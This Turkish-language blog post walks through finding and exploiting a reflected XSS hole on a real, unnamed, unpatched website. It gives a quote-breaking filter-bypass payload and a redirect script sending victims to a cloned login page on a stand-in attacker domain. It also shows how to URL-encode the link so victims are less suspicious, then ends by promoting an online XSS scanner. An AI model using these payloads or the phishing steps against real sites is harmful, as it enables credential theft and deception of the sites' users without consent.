Pentest

[TR] Uygulamalı XSS Açığı Bulma ve İstismar Etme

[TR] Uygulamalı XSS Açığı Bulma ve İstismar Etme

Selamlar, bu konuda beraber XSS açığı bulacağız. Çoğu site bunu teorik olarak anlatmış. Bakalım işler gerçekte nasıl dönüyor.

Şimdi kendimize bir hedef seçeceğiz ve manuel deneme yapmaya başlayacağız. Açık kapatılmadığı için site adresinden söz etmeyeceğim, ekran görüntüleri ile sorunsuz bir şekilde anlatım yapacağım.

Evet sitemize girdik ve bir textbox arıyoruz. Bu bir arama kutusu, iletişim formu veya ziyaretçi defteri olabilir. Ben bir arama kutusu buldum ve basit bir javascript kodu çalıştırmayı deniyorum. Kodumuz şu şekilde;

<script>alert(“açık var”);</script>

Başarısız XSS Bulma Girişimi

Evet siteyi kodlayan admin xss açığını önlemek için ” (çift tırnak işareti) işaretinden sonrasının silinmesi için kod yazmış. Ama bu bizi vazgeçirmiyor. Ve aklımıza ” işareti kullanmadan bir integer değişkenini alert fonksiyonu ile yazdırmak geliyor. Ayrıca yeşil renkle belirttiğim yerde ufak bir hata çıkıyor ve bir kod parçası gözüküyor. Ama şu an konumuz bu değil. Devam edelim.

XSS Deneme 2

Bunu arayalım bakalım etkili olacak mı?

Denemeye Devam Yılmak Yok

Sonradan yaptığım incelemede bu güvenlik önlemini baypass etmeyi başardım işte şu kod ile:

“><script>alert(“baypass edildi”)</script>

Dikkat ettiyseniz başına “> ibaresini koydum. Demek ki kodlayan buna önlem almamış ve bu ibareyi koyduğumuzda onun kod satırını bitirip kendimiz yenisini yazmış oluyoruz.

Evet kodu başarıyla çalıştırmış bulunmaktayız arkada banner olduğu için sitenin güvenliği açısından karaladım. Peki bununu bulduk ama nasıl istismar edeceğiz?

XSS Yönlendirme ile Phishing Saldırısı

Bu saldırıda XSS açığını kullanarak kurbanı sitenin klonunu oluşturduğumuz kendi sitemize yönlendireceğiz.

“><script language=”Javascript”>window.location.href=”https://saldirgansitesi.com/login.html”</script>

Bunu XSS açığı bulduğumuz sitenin link çubuğu kısmına yapıştırdığımızda belirttiğimiz siteye yönlendirecektir. Ve biz sitenin klonunu oluşturmuş olacağımız için şüphelenmeden girdiği bilgiler bize gelecek. Linkin son hali;

http://hedefsite.com/?r=”><script language=”Javascript”>window.location.href=”https://saldirgansitesi.com/login.html”</script>

Ama bu şekilde linki kurbana gönderirsek kanmayacaktır. Bunu biraz düzenleyelim. Kullanacağımız site: https://www.urlencoder.org

Sadece ?r= ibaresinden sonrakileri encode edeceğiz. Ve ortaya bu çıkacak. Şimdi biraz daha inandırıcı.

%22%3E%3Cscript%20language%3D%22Javascript%22%3Ewindow.location.href%3D%22https%3A%2F%2Fsaldirgansitesi.com%2Flogin.html%22%3C%2Fscript%3E

Evet bunu http://hedefsite.com/?r= den sonrasına yapıştıracağız. İstediğimiz siteye bu şekilde yönlendirmiş olduk.

{*/DAKİKALAR İÇERİSİNDE XSS AÇIĞINI TESPİT ETMEK/*}

Buraya kadar her şey harika olsa da bu işlemler oldukça zaman alıcı. Bunları otomatikleştiren platformlar olmalı diye düşünmüş olabilirsiniz. Bu konuda burp suit aracının pro sürümü yararlı olur. Ayrıca bunu sağlayan web hizmetleri de mevcut. Üstelik çok daha düşük fiyatlara. Biz şimdilik ücretli bir web hizmetinin deneme hizmetini kullanarak aynı siteyi test edeceğiz. Site adresimiz: pentest-tools.com/website-vulnerability-scanning/xss-scanner-online bu araç sitedeki XSS açıklarını tarayacak. Hemen deneyelim.

XSS Tarama Sonucu

 

Başarılı bir şekilde XSS açığını dakikalar içinde buldu ve rapor etti. Sayfayı aşağıya kaydırırsak bu raporu görebiliriz.

Umarım keyifli bir okuma olmuştur. Bir sonraki yazımda görüşmek üzere…

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu